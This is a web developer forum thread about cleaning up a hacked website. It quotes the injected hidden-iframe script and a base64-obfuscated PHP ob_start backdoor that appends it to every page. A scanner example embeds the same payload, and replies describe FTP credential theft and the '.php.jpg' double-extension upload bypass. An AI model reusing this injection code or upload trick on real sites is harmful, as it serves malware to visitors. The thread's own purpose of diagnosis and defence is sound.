Injected Malware
#1

[eluser]CocoMansur[/eluser]
Recently I encountered malware: a script was injected into our website.

Code:
[removed][removed]('<style>.vb_style_forum {filter:
alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div
class="vb_style_forum"><iframe height="150" width="200"
src="http://vidintex.com/includes/class.pop.php"></iframe></div>');[removed]

Bad for me, I wasn't able to have a clean back-up of our whole website. So what I did was download all the files in public_html/, then scan them with Kaspersky AV; threats were detected and cleaned. I also made a string search for the script and found 3 .js files that had that script, and deleted it from them too. Scanned again with an AV and it's now clean.

Uploaded the whole set of files to the web server and everything seemed fine, but then I noticed there was a gap at the bottom of the page. I checked the source code and found out that a script was still appended at the bottom of the page, after the </html> tag.

I did a string search again through the files but the script was not found; then I did a manual search and noticed index.php had injected code:

Code:
ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShvcGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI+PGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJodHRwOi8vdmlkaW50ZXguY29tL2luY2x1ZGVzL2NsYXNzLnBvcC5waHAiPjwvaWZyYW1lPjwvZGl2PicpOzwvc2NyaXB0Pg==');}

I deleted the code and the appended script on the page is now gone. Any ideas how they managed to inject that code?

Anyway, I also posted this in case someone might have this same problem in the future.
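As an added example (not code from the thread or from the poster), a small Python scanner for the pattern shown above: it picks out ob_start() callbacks registered by name and decodes every base64 literal fed to base64_decode(), flagging those that hide markup such as a script or iframe, which a plain string search for the HTML will never find. The sample index.php is constructed here around the base64 string quoted in the post; the surrounding PHP lines are made up.

```python
import base64
import binascii
import re

# Constructed sample: a PHP front controller carrying the ob_start() output-filter
# backdoor quoted in the post (base64 string from the thread; other PHP lines made up).
SAMPLE_INDEX_PHP = (
    "<?php\n"
    'ob_start("security_update"); function security_update($buffer){'
    "return $buffer.base64_decode('"
    "PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShv"
    "cGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2"
    "IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI+PGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJo"
    "dHRwOi8vdmlkaW50ZXguY29tL2luY2x1ZGVzL2NsYXNzLnBvcC5waHAiPjwvaWZyYW1lPjwvZGl2PicpOzwv"
    "c2NyaXB0Pg==');}\n"
    "echo 'site content';\n"
)

# Output-buffer callback registered by name, e.g. ob_start("security_update").
OB_START_RE = re.compile(r"""ob_start\s*\(\s*["']([A-Za-z_]\w*)["']""")
# Base64 literal fed to base64_decode(); grepping for the injected HTML misses these.
B64_LITERAL_RE = re.compile(r"""base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)""")
# Markup that has no business being appended to a page after </html>.
MARKERS = ("<script", "<iframe", "document.write", "eval(")

def decode_literals(php_source: str) -> list[str]:
    """Decode every base64 literal passed to base64_decode(); skip malformed ones."""
    decoded = []
    for literal in B64_LITERAL_RE.findall(php_source):
        try:
            decoded.append(base64.b64decode(literal).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue
    return decoded

def find_output_filter_backdoors(php_source: str) -> list[dict]:
    """Return decoded payloads that contain injected markup, with the ob_start callback."""
    callbacks = OB_START_RE.findall(php_source)
    findings = []
    for payload in decode_literals(php_source):
        hits = [m for m in MARKERS if m in payload]
        if hits:  # decoded text smuggles markup: report callback, markers and payload
            findings.append({"callback": callbacks[0] if callbacks else None,
                             "markers": hits, "payload": payload})
    return findings

if __name__ == "__main__":
    for hit in find_output_filter_backdoors(SAMPLE_INDEX_PHP):
        print(f"callback={hit['callback']} markers={hit['markers']}\n{hit['payload']}")
```

Run it over a downloaded copy of public_html by reading each .php file into find_output_filter_backdoors(); a hit means the output buffer, not the templates, is where the appended markup comes from.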
#2

[eluser]skunkbad[/eluser]
Usually that kind of code is injected by hackers who got your FTP credentials through a virus on your computer, or on any network where you used plain FTP. Even if another computer on your network is infected, you will probably have your website hacked again.
#3

[eluser]boltsabre[/eluser]
FTP sounds like the culprit; it normally is.

Also (I think, but I'm not the world's best hacker), if you have a file upload part on your site (i.e., profile image upload) that isn't secure, they could have uploaded a malicious PHP script that opened the infected files and wrote that code into them. In which case cleaning them up like you have will more than likely not fix the problem; all the hacker has to do is call that script again and it will write the code back in.
Do you have file upload? If so, when users upload a file do you rename it to something very random and store that in the DB? If it's just an image uploader, do you redraw the image? If you're not familiar with file upload security risks (and they are BIG) I'd research them. Interesting stuff, what these sneaky buggers can do! You can create a PHP file and call it myfilename.php.jpg and it will pass many image upload validation scripts, yet execute as PHP; it's called a "double extension" injection. Or hiding PHP (JS?) in a file's metadata, and when the file is called/loaded it will execute it. Grrrrr.....
#4

[eluser]jojo777[/eluser]
This topic can be very useful for people like me; I'm trying to understand how to avoid that kind of input from users, uploading PHP as JPEG or uploading images with PHP code inside them.

How can we avoid this kind of situation?

I Googled and only found common controls like checking the extension of the file, but that's not sufficient. I would like to know what redrawing an image consists of and how to do it.

In addition to this situation, there's also CSRF, or whatever else I didn't even know existed O_O

Thanks!

Sorry if I made mistakes with my English.
#5

[eluser]Unknown[/eluser]
I had a similar problem yesterday; the code was injected into all index.html and index.php files throughout the web root folder, including my EE system folder. There was no upload form, yet the host insisted on blaming EE for a bad script or something. Is this likely the case? Or do you think the 4-year-old Windows NT webserver is the problem?
#6

[eluser]InsiteFX[/eluser]
You need to chmod your index.php file to 644, read only!